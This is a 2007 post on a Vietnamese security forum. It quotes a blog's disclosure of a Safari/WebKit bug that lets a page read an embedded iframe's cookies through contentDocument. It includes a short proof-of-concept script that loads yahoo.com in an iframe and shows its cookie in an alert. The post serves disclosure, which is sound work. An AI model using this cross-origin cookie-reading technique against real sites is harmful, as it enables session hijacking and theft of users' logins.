English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits XSS on Safari  XML
  [Announcement]   XSS on Safari 08/08/2007 01:44:07 (+0700) | #1 | 77609
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]

http://xssinsafari.blogspot.com/2007/08/bug-in-safari-allows-xss-attacks-on.html wrote:
Bug in Safari allows XSS attacks on websites. Safari/Webkit allows "contentDocument" attribute of iframe's to be read from containing page.This can be used to get the cookie of the "iframe". The exploit does not work in other browsers.


< iframe id="subfr" height="300" width="300" src="http://www.yahoo.com" > < /iframe >
< script >setTimeout('later();', 2000);
function later()
{
var subFrame = document.getElementById("subfr");
window.alert("your yahoo cookie is " + subFrame.contentDocument.cookie);
}
< /script > 

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|